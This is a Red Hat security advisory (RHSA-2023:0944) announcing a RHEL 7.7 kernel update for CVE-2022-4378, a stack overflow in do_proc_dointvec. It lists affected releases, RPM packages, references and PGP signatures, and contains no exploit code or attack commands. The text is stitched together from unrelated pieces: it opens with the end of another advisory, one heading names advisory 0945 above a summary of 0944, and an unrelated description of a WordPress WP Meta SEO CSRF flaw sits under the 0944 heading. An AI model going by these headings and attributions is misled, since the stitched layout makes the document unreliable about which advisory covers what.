details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/3zwNzjgjWX9erEAQgckw/7B9elFpmuesMfyPfX2TOojH8y3cplE1Bl  
MkYwIDtD1hsuQPs+CyAczXmybgFA2E+Lruldm9MI3qcyKkQDUjsKUTyO+OKqPQz/  
TgohO3q04tg/uEMGod96pcj5gn+/wddXzMH69tWLkAGlj+IS7vaj1zcCzpqoRkBL  
Ld4QCi4lAZcByXn8KZpcqT8SUJhhCHcSwJjgjBiiWlMuh1BQpTcnaOU+YSRUK7ox  
e/eRn3KzkXf0mEp648t6SLs74IFrmlgtswUGZYxRGVBZnm9U1hl8uIFOMZNeekKf  
TL2K+r2KwcFEOAr1q2oVaaqgNyr1r/P094rZqUtdah80gu8xnaH2nXV7pjOH2xy8  
oorD/XpbZyg6/3XZwKRGMVJkcyqBaUiNy9I85qi0kffk52rQWjP88TKPM9Nq5S2T  
ZkmLOgTNelWNsv10KwR87K+rg9+F+GlFTEtGwUOcmlLEVwd+cAJb6HAXJrBULXCA  
5WNQacQtJ4JQ6iSaZfNRDfsHk44cXzeSMpyKDqZUlaVsZaq4BtgHMRfnSNLnw1k1  
N2rsmA2Dp6+CHY4nStTOsFIqCqh7HHqVLxUxIoGegwTdzbD59EdCICiIOj9bUJDL  
62urASH/uAxCFMFPaAx2JefEZkwCzPYJVTxoejFnESSkkxJ5rIrxiz05HgNVkA/g  
SfHzKU8H41E=  
=xuoe  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0945-01

Red Hat Security Advisory 2023-0944-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security update  
Advisory ID:       RHSA-2023:0944-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0944  
Issue date:        2023-02-28  
CVE Names:         CVE-2022-4378   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.7  
Advanced Update Support, Red Hat Enterprise Linux 7.7 Telco Extended Update  
Support, and Red Hat Enterprise Linux 7.7 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server AUS (v. 7.7) - noarch, x86_64  
Red Hat Enterprise Linux Server E4S (v. 7.7) - noarch, ppc64le, x86_64  
Red Hat Enterprise Linux Server Optional AUS (v. 7.7) - x86_64  
Red Hat Enterprise Linux Server Optional E4S (v. 7.7) - ppc64le, x86_64  
Red Hat Enterprise Linux Server Optional TUS (v. 7.7) - x86_64  
Red Hat Enterprise Linux Server TUS (v. 7.7) - noarch, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces

6. Package List:

Red Hat Enterprise Linux Server AUS (v. 7.7):

Source:  
kernel-3.10.0-1062.71.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.71.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.71.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-1062.71.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server E4S (v. 7.7):

Source:  
kernel-3.10.0-1062.71.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.71.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.71.1.el7.noarch.rpm

ppc64le:  
bpftool-3.10.0-1062.71.1.el7.ppc64le.rpm  
bpftool-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-bootwrapper-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debug-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-devel-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-headers-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-tools-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-tools-libs-3.10.0-1062.71.1.el7.ppc64le.rpm  
perf-3.10.0-1062.71.1.el7.ppc64le.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
python-perf-3.10.0-1062.71.1.el7.ppc64le.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm

x86_64:  
bpftool-3.10.0-1062.71.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server TUS (v. 7.7):

Source:  
kernel-3.10.0-1062.71.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.71.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.71.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-1062.71.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 7.7):

x86_64:  
bpftool-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional E4S (v. 7.7):

ppc64le:  
bpftool-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debug-devel-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-tools-libs-devel-3.10.0-1062.71.1.el7.ppc64le.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm

x86_64:  
bpftool-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional TUS (v. 7.7):

x86_64:  
bpftool-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/3zrdzjgjWX9erEAQiWkQ//d8OoWO+BV0oKuhGiTvH7W/uP29aDTHe+  
iMd8yztBdHqZ4kpxI8Ro4nF64BYcnGhhY2fOQ54qPiqSyhooqz7QWrSzwdFvEPzX  
UeQCOtOj6Z3RBhfiyd1a8JLeK0hasCHJL6kR2Onipqpzvi7D2ihjFcy8censOxtp  
roi3FPBJzlC/PmmKgwFdDjFe2G9ZbiZ7plTIkjgzkFGpWah1An/OG0/rBmIDsUpf  
65bZZ6H7jyp8jUg8TCwfONxnJx7wlfev/ixZb/9ZPxkqqYq+mLhCLf3OLnSo0rNZ  
CUAQtbanYKT9x5fUU72diVG3h5pe1LD+8sG7se8pWNSHp3leaN5MB+Jdt5f0MTAn  
EJ4uI5ABEdoLeqbprNedtB8ngLhmNBrd8056T1oXEQDUDLjSJeYJpIbWZkpIG2WU  
1qjsEG5GssicaNx3NMf6Q528UwTpGbhKxHVfY35mqCbmGxWoMZC+5cjtPZQkHkEQ  
Qnp40RMP5bRGOlfbMeIb8vi7lrfvna1JsWm697zGJWD+CA9d02Td+kW58BITyfVc  
weJ8YOgvrgPq+61rNU/2yEoXoSdUlvJ0ajl+JYhod4RVpNZcEMK/lqu6QYejHNc2  
BlIN2OvZo3gVoslDDZq06NFd94p9spubcGXgWMN1zjNcqAV4wgjpnvzdjqj2cQTq  
JFTz9qAr0JE=  
=E5Jd  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0944-01

The WP Meta SEO plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.5.3. This is due to missing or incorrect nonce validation on the setIgnore function. This makes it possible for unauthenticated attackers to update plugin options via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

Tag

#sap